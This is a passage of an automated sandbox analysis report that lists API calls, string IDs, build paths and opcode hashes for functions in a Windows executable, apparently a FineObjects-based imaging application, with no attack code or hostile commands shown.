                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: J8G$xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-2052193363
                                                                                                • Opcode ID: 362b694be55ff89b3dbbd7addc7458e1376b03d185b4df2b7e97611c4833b685
                                                                                                • Instruction ID: ecac0831be65e3dd2b41348a4f5c5e169bbbdd00c9758bb52e5567dbf9f88608
                                                                                                • Opcode Fuzzy Hash: 362b694be55ff89b3dbbd7addc7458e1376b03d185b4df2b7e97611c4833b685
                                                                                                • Instruction Fuzzy Hash: 4C518C31900649EFCB01EF69CC40BAEBFB5BF49705F148469E804A7351DB78AE06DBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00469600: InterlockedIncrement.KERNEL32(00530380), ref: 00469637
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A423
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A43F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A45B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A477
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A493
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A4AF
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A4CB
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A4EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: TO$]: SetInt( $xMS$xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-3277176692
                                                                                                • Opcode ID: 7a0eec4cfb6594463b5199dc735b03c0640f4c1ab7ab3823bc6a00ce5c91b457
                                                                                                • Instruction ID: b1691226b321db7921e8aa3ae70602f9c0dbaec5af3e2a3bfa07c2a8f2155134
                                                                                                • Opcode Fuzzy Hash: 7a0eec4cfb6594463b5199dc735b03c0640f4c1ab7ab3823bc6a00ce5c91b457
                                                                                                • Instruction Fuzzy Hash: 7C712571E00654ABDB01EF65CC41BBFBBB5AF84B14F14855DE80067381EB78AE02C7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetSysColor.USER32(00000008), ref: 0044F1D8
                                                                                                • GetSysColor.USER32(00000011), ref: 0044F1EA
                                                                                                  • Part of subcall function 0044B720: GetTextMetricsW.GDI32(?,?,00000000), ref: 0044B762
                                                                                                • GetFocus.USER32 ref: 0044F1EE
                                                                                                • GetSysColor.USER32(0000000D), ref: 0044F260
                                                                                                • GetSysColor.USER32(0000000E), ref: 0044F267
                                                                                                • SendMessageW.USER32(00000003,00000031,00000000,00000000), ref: 0044F29E
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0044F2B0
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0044F351
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0044F383
                                                                                                • DrawTextW.USER32(?,?,00000003,?,00000024), ref: 0044F3AF
                                                                                                • SetBkMode.GDI32(?,000000FF), ref: 0044F3CF
                                                                                                • SetTextColor.GDI32(?,?), ref: 0044F3DD
                                                                                                • SelectObject.GDI32(?,?), ref: 0044F3E7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0044F3FC
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00452270: SelectClipRgn.GDI32(?,00000000), ref: 004522C8
                                                                                                  • Part of subcall function 00452270: SelectClipRgn.GDI32(?,00000000), ref: 00452310
                                                                                                  • Part of subcall function 00452270: DeleteObject.GDI32(?), ref: 00452333
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Color$SelectText$Object$ClipCriticalModeSectionValue$DecrementDeleteDrawEnterException@8FocusInterlockedLeaveMessageMetricsSendThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\dcawl.cpp$xMS
                                                                                                • API String ID: 707646636-972229737
                                                                                                • Opcode ID: 6e884fbd881b663f2e4bcc7fbecbf9d90910d7bb55258a655724b70f61e1dc5a
                                                                                                • Instruction ID: db5d37796faf6b0c3d7bd4fc8651946266bbc116ce64df1abe9c63533f1027b2
                                                                                                • Opcode Fuzzy Hash: 6e884fbd881b663f2e4bcc7fbecbf9d90910d7bb55258a655724b70f61e1dc5a
                                                                                                • Instruction Fuzzy Hash: 5A71F571D00618ABEB14DFA4DD45BEEBBB8FF44304F04412AF915B3282DBB95A14CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 004322DC
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00432308
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0043236A
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0043237C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004323A5
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004323C7
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00432426
                                                                                                • InterlockedDecrement.KERNEL32 ref: 0043242F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00432452
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043246E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$IncrementWindow$Long
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2860197702-2854486462
                                                                                                • Opcode ID: 1ba07588becc0f94a4f6333633f64f537025ad229b304d35ba07b6f1d431457a
                                                                                                • Instruction ID: 62d3f9bbc7890e286af9606ee0a5f1caa7cc39b64878849a6dde78b622512877
                                                                                                • Opcode Fuzzy Hash: 1ba07588becc0f94a4f6333633f64f537025ad229b304d35ba07b6f1d431457a
                                                                                                • Instruction Fuzzy Hash: C551A071A00605ABDB10EFA9CD41BAFBBB5BF58704F104529F501E7391DBB8AE01CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A194
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A1B0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A1CC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A1E8
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A207
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A2B8
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042A2D7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: TO$]: GetInt( $propVar.lVal = $xMS$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 3448037634-3679920645
                                                                                                • Opcode ID: 7ea25e9be254ce0bb0dec9009b0e234836390326b95bdf903e5473dc71d37128
                                                                                                • Instruction ID: 82f44a2364cad49136ede61f80e6d03cd7701c0f4704051742463bd5f0a2252f
                                                                                                • Opcode Fuzzy Hash: 7ea25e9be254ce0bb0dec9009b0e234836390326b95bdf903e5473dc71d37128
                                                                                                • Instruction Fuzzy Hash: 1A61F771E01A14ABDB01EF65CC01BEFBBB5AF44714F148159E80177381DB79AE0187EA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0047908D
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004790A2
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004790B4
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004790C6
                                                                                                  • Part of subcall function 004770E0: InterlockedIncrement.KERNEL32(00530380), ref: 00477107
                                                                                                  • Part of subcall function 00477630: InterlockedIncrement.KERNEL32(00530380), ref: 00477668
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0047910C
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00479117
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047913A
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00479156
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00479172
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0047918E
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004791AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 4289621856-1716712832
                                                                                                • Opcode ID: 9457e54b3bd4c24b3204ca95cfcb4d50ae1e16167aa69791aa82ff8fddfe80fe
                                                                                                • Instruction ID: db026a6decc22fbbb6f395bbd224a27335184a4ab17bc11c77161cd458d42953
                                                                                                • Opcode Fuzzy Hash: 9457e54b3bd4c24b3204ca95cfcb4d50ae1e16167aa69791aa82ff8fddfe80fe
                                                                                                • Instruction Fuzzy Hash: D341C572901B5AABDB02EFA5CC01AEFBBB8FF45714F004999E400B3251D7796E058BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0044AB10: CreateCompatibleDC.GDI32(0044AC49), ref: 0044AB1E
                                                                                                  • Part of subcall function 0044AB10: GetLastError.KERNEL32 ref: 0044AB2B
                                                                                                • SendMessageW.USER32(00512B54,00000031,00000000,00000000), ref: 0044609F
                                                                                                • SelectObject.GDI32(?,00000000), ref: 004460E6
                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 00446162
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00446183
                                                                                                • GetTextMetricsW.GDI32(?,?), ref: 004461F4
                                                                                                  • Part of subcall function 004397E0: GetObjectW.GDI32(00000000,0000005C,?,?,?,00000000,004460BC), ref: 0043980C
                                                                                                  • Part of subcall function 004397E0: GetLastError.KERNEL32(?,00000000,004460BC), ref: 00439816
                                                                                                  • Part of subcall function 00439870: CreateFontIndirectW.GDI32(?), ref: 00439878
                                                                                                  • Part of subcall function 00439870: GetLastError.KERNEL32(?,?,0043F3D3,?), ref: 00439884
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00446253
                                                                                                • InterlockedDecrement.KERNEL32(00445899), ref: 00446279
                                                                                                • SelectObject.GDI32(?,?), ref: 0044629C
                                                                                                • DeleteObject.GDI32(00000000), ref: 004462BD
                                                                                                • DeleteDC.GDI32(?), ref: 004462D6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Object$DecrementErrorInterlockedLast$CreateDeleteMetricsSelectText$CompatibleFontIndirectMessageSend
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\gdiglobalsawl.cpp$xMS$xMS$xMS
                                                                                                • API String ID: 395179358-1862581547
                                                                                                • Opcode ID: 4e251d5c7a0e23baad4d86e3625234f80417aecaa7dd0cdbdfe4e2d7a9c26c97
                                                                                                • Instruction ID: 84af35c8ef6b1addf6ab635d8b30a0aa5b95e214fd4c4647de64123d2284f37e
                                                                                                • Opcode Fuzzy Hash: 4e251d5c7a0e23baad4d86e3625234f80417aecaa7dd0cdbdfe4e2d7a9c26c97
                                                                                                • Instruction Fuzzy Hash: 79915C70A00218EFDB00DFA8C945BAEBBF9FF49314F14855AE805A7382D7789E04CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000001,00000001), ref: 004A41A6
                                                                                                • EnterCriticalSection.KERNEL32(00000045), ref: 004A41EF
                                                                                                • LeaveCriticalSection.KERNEL32(00000045,?), ref: 004A422E
                                                                                                • EnterCriticalSection.KERNEL32(000000CD), ref: 004A4286
                                                                                                • LeaveCriticalSection.KERNEL32(000000CD,?,00000001), ref: 004A42C1
                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,0049F60D,00000000,00000000,?,00000004), ref: 004A4343
                                                                                                • EnterCriticalSection.KERNEL32(0000002C), ref: 004A4305
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • LeaveCriticalSection.KERNEL32(000000FF,0049F60D,?), ref: 004A43AE
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 004A43D8
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$Value$DecrementInterlocked$Exception@8Throw
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverconnectionjobqueue.cpp$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 2806878186-3648222207
                                                                                                • Opcode ID: 0764529ff398d59bd6318c7150637ceac892f89a5f16b31629bc84897391a1d1
                                                                                                • Instruction ID: 54efde38c32a4330388c0811fb2d5688027c551340eb27fe6d75d32ccd8cc3f3
                                                                                                • Opcode Fuzzy Hash: 0764529ff398d59bd6318c7150637ceac892f89a5f16b31629bc84897391a1d1
                                                                                                • Instruction Fuzzy Hash: F0919470900248AFDF00DFA9C945BEEBBF4AF59314F14815EE905BB381D7B4AA04CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • TlsGetValue.KERNEL32(HfO,00000008,?,0053011C), ref: 004290B0
                                                                                                • InterlockedIncrement.KERNEL32(00000008), ref: 0042919E
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004291AE
                                                                                                • InterlockedDecrement.KERNEL32(00001002), ref: 00429211
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042922D
                                                                                                  • Part of subcall function 00483EC0: EnterCriticalSection.KERNEL32(00534D78), ref: 00483F16
                                                                                                  • Part of subcall function 00483EC0: LeaveCriticalSection.KERNEL32(00534D78,@fO), ref: 00483F6D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementValue$CriticalSection$EnterIncrementLeave
                                                                                                • String ID: @fO$@fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$HfO$Wia\WiaItemBase.cpp$item:$u j$xMS$xMS$xMS
                                                                                                • API String ID: 4191825374-3097276918
                                                                                                • Opcode ID: 03fcf488cdd4790c7e1f65f03db1976bbd2bc29103d0e68261f4629ae9cd7bd0
                                                                                                • Instruction ID: b35c284497c0b5bd17cedc017dadcef4f121fe599160a228b5698fe675b548f4
                                                                                                • Opcode Fuzzy Hash: 03fcf488cdd4790c7e1f65f03db1976bbd2bc29103d0e68261f4629ae9cd7bd0
                                                                                                • Instruction Fuzzy Hash: A451CF74600609EBD710DF19CC45B7BBBB5AF44704F24841EE919AB392DBB8ED018B88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534CD8), ref: 00481414
                                                                                                • TlsGetValue.KERNEL32 ref: 0048142B
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 00481449
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00481461
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00481498
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 004814A6
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004814CF
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0048153B
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00481547
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00481570
                                                                                                • TlsSetValue.KERNEL32(0053011C), ref: 00481592
                                                                                                • LeaveCriticalSection.KERNEL32(00534CD8), ref: 004815A1
                                                                                                  • Part of subcall function 004798D0: GetTempPathW.KERNEL32(00000000,00000000,00000000,0053011C), ref: 00479905
                                                                                                  • Part of subcall function 004798D0: InterlockedIncrement.KERNEL32(00530380), ref: 00479918
                                                                                                  • Part of subcall function 004798D0: GetLastError.KERNEL32 ref: 0047992C
                                                                                                  • Part of subcall function 004798D0: InterlockedDecrement.KERNEL32(00530380), ref: 00479945
                                                                                                  • Part of subcall function 004798D0: InterlockedIncrement.KERNEL32(00530380), ref: 00479969
                                                                                                  • Part of subcall function 004798D0: GetTempPathW.KERNEL32(00000000,-0000000C), ref: 004799D2
                                                                                                  • Part of subcall function 004798D0: GetLastError.KERNEL32 ref: 004799DA
                                                                                                  • Part of subcall function 004798D0: InterlockedIncrement.KERNEL32(00530380), ref: 00479A1E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement$Value$CriticalErrorLastPathSectionTemp$EnterLeave
                                                                                                • String ID: xMS$xMS$xMS$xMS
                                                                                                • API String ID: 1137911601-2407597445
                                                                                                • Opcode ID: 13243b75771c375203a3e1eba3a399d5031437742303002834ff9dff8af9b66d
                                                                                                • Instruction ID: 45c8965f6367e80a4e8135d8299fd3e8b9a5ab8f8f9064d3fdc2898f1dc4ef7a
                                                                                                • Opcode Fuzzy Hash: 13243b75771c375203a3e1eba3a399d5031437742303002834ff9dff8af9b66d
                                                                                                • Instruction Fuzzy Hash: 66513670901249EFDB00EFA8C845BAEBBF5BF49704F10446AE405E7362C7799D04CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0049E3B3
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0049E3BE
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0049E3E6
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049E3EC
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0049E411
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 0049E455
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049E461
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0049E485
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049E4A1
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0049E4BD
                                                                                                  • Part of subcall function 0046BFB0: InterlockedDecrement.KERNEL32(00000000), ref: 0046C163
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: Diagnostic Message: $xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-1494765566
                                                                                                • Opcode ID: 1776c9c5a49d1c9344d6b2e7b2c1f62a9d1468098b05402cd1b9c86c1b04dc5b
                                                                                                • Instruction ID: d5c31df593592e1280ca361b6829bb1bd0f96e389c1bbf86065a4767d6ca0a57
                                                                                                • Opcode Fuzzy Hash: 1776c9c5a49d1c9344d6b2e7b2c1f62a9d1468098b05402cd1b9c86c1b04dc5b
                                                                                                • Instruction Fuzzy Hash: CB51A870500A44EFCB11EF69CC80B6EBFF4BF45710F148969E85497392D7B8AA05CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(00000000,GetResourceID), ref: 004850F0
                                                                                                • GetProcAddress.KERNEL32(00000000,NumberOfMessages), ref: 004850FF
                                                                                                • GetProcAddress.KERNEL32(00000000,GetMessageName), ref: 0048510E
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000024), ref: 0048511A
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00485121
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00485160
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 00485191
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc$CriticalHeapInterlockedSectionValue$AllocDecrementEnterException@8IncrementLeaveProcessThrow
                                                                                                • String ID: Ot Ut$@fO$FineObjects: Can't load resource DLL %s.$FineObjects: Resource DLL %s is loaded.$GetMessageName$GetResourceID$NumberOfMessages$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$xMS
                                                                                                • API String ID: 733126831-2390242303
                                                                                                • Opcode ID: be1ac5494cb97e38f30b517bbabcaec3f9f68358988164e55529e7c9a557ce8c
                                                                                                • Instruction ID: 97eb1ce5a4d73cf8bb72f08895a61237b95480ee9be5992d8783b7ab16772d41
                                                                                                • Opcode Fuzzy Hash: be1ac5494cb97e38f30b517bbabcaec3f9f68358988164e55529e7c9a557ce8c
